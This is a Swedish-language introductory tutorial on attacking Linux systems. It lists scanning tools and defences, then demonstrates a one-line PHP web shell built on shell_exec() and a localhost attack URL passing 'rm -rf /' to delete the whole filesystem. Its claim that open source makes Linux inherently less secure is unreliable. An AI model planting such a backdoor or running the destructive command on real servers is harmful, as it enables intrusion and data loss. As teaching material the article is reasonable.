Hacka Linux OS: Hacka med Ubuntu (Kommandohandledning)
Linux är det mest använda serveroperativsystemet, speciellt för webbservrar. Det är öppen källkod; det betyder att vem som helst kan ha tillgång till källkoden. Detta gör det mindre säkert jämfört med andra operativsystem eftersom angripare kan studera källkoden för att hitta sårbarheter. Linux för Hackers handlar om att utnyttja dessa sårbarheter för att få obehörig åtkomst till ett system.
I den här artikeln kommer vi att introducera dig till vad Linux är, dess säkerhetssårbarheter, hacking med Ubuntu och de motåtgärder du kan vidta.
Snabbanteckning om Linux
Linux är ett operativsystem med öppen källkod. Det finns många distributioner av Linux-baserade operativsystem som Redhat, Fedora och Ubuntu, etc. Till skillnad från andra operativsystem är Linux mindre säkert när det kommer till säkerhet. Detta beror på att källkoden är tillgänglig fritt, så det är lätt att studera den för sårbarheter och utnyttja dem jämfört med andra operativsystem som inte är öppen källkod. Linux kan användas som operativsystem för server, dator, surfplatta eller mobil enhet.
Linux-program kan användas med antingen GUI eller kommandon. Linux-kommandon för Kali Linux hackning är mer effektiva och effektiva jämfört med att använda GUI. Av denna anledning hjälper det att känna till grundläggande Linux-kommandon för hackning.
Se dessa handledningar https://www.guru99.com/unix-linux-tutorial.html om hur man kommer igång med Kali Linux hacka.
Linux Hacking Tools
- Nessus– detta verktyg kan användas för Ubuntu hacka, skanna konfigurationsinställningar, patchar och nätverk etc. den finns på https://www.tenable.com/products/nessus
- NMap. Detta verktyg kan användas för att övervaka värdar som körs på servern och de tjänster som de använder. Den kan också användas för att skanna efter portar. Den finns på https://nmap.org/
- SARA – SARA är förkortningen för Security Auditor's Research Assistant. Som namnet antyder kan detta verktyg användas för att granska nätverk mot hot som t.ex SQL Injection, XSS etc. den finns på http://www-arc.com/sara/sara.html
Listan ovan är inte uttömmande; det ger dig en uppfattning om vilka verktyg som finns tillgängliga för Ubuntu hacka och hacka Linux-system.
Hur man förhindrar Linux-hack
Linux Hacking drar fördel av sårbarheterna i operativsystemet. En organisation kan anta följande policy för att skydda sig mot sådana attacker.
- Patchhantering– patchar fixar buggar som angripare utnyttjar för att äventyra ett system. En bra policy för patchhantering säkerställer att du ständigt tillämpar relevanta patchar på ditt system.
- Korrekt OS-konfiguration– andra utnyttjande utnyttjar svagheterna i serverns konfiguration. Inaktiva användarnamn och demoner bör inaktiveras. Standardinställningar som vanliga lösenord till applikationer, standardanvändarnamn och vissa portnummer bör ändras.
- Intrusionsdetekteringssystem– sådana verktyg kan användas för att upptäcka obehörig åtkomst till systemet. Vissa verktyg har förmågan att upptäcka och förhindra sådana attacker.
Hackingaktivitet: Hack a Ubuntu Linux-system som använder PHP
I det här praktiska scenariot kommer vi att lära oss hur man hackar med Ubuntu och vi kommer att förse dig med grundläggande information om hur du kan använda PHP att kompromissa med en Linux. Vi kommer inte att rikta oss mot något offer. Om du vill prova det kan du installera LAMPP på din lokala dator.
PHP kommer med två funktioner som kan användas för att köra Linux-hackningskommandon. Den har funktionerna exec() och shell_exec(). Funktionen exec() returnerar den sista raden i kommandoutgången medan shell_exec() returnerar hela resultatet av kommandot som en sträng.
För demonstrationsändamål, låt oss anta att angriparansvariga laddar upp följande fil på en webbserver.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
HÄR,
Ovanstående skript hämtar kommandot från GET-variabeln som heter cmd. Kommandot körs med shell_exec() och resultaten returneras i webbläsaren.
Ovanstående kod kan utnyttjas med hjälp av följande URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HÄR,
- “…konsole.php?cmd=ls%20-l”tilldelar värdet ls –l till variabeln cmd.
Kommandot i Ubuntu för hackning mot servern kommer att utföras som
shell_exec('ls -l') ;
Att köra ovanstående kod på en webbserver ger resultat som liknar följande.
Ovanstående kommando visar helt enkelt filerna i den aktuella katalogen och behörigheterna
Låt oss anta att angriparen skickar följande kommando
rm -rf /
HÄR,
- "rm" tar bort filerna
- "rf" gör att rm-kommandot körs i ett rekursivt läge. Ta bort alla mappar och filer
- "/" instruerar kommandot att börja radera filer från rotkatalogen
Attack-URL:n skulle se ut ungefär så här
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Sammanfattning
- Linux är ett populärt operativsystem för servrar, stationära datorer, surfplattor och mobila enheter.
- Linux är öppen källkod, och källkoden kan erhållas av vem som helst. Detta gör det lätt att upptäcka sårbarheterna. Det är ett av de bästa operativsystemen för hackare.
- Grundläggande och nätverkshackningskommandon in Ubuntu är värdefulla för Linux-hackare.
- Sårbarheter är en svaghet som kan utnyttjas för att äventyra ett system.
- En bra säkerhet kan hjälpa till att skydda ett system från att äventyras av en angripare.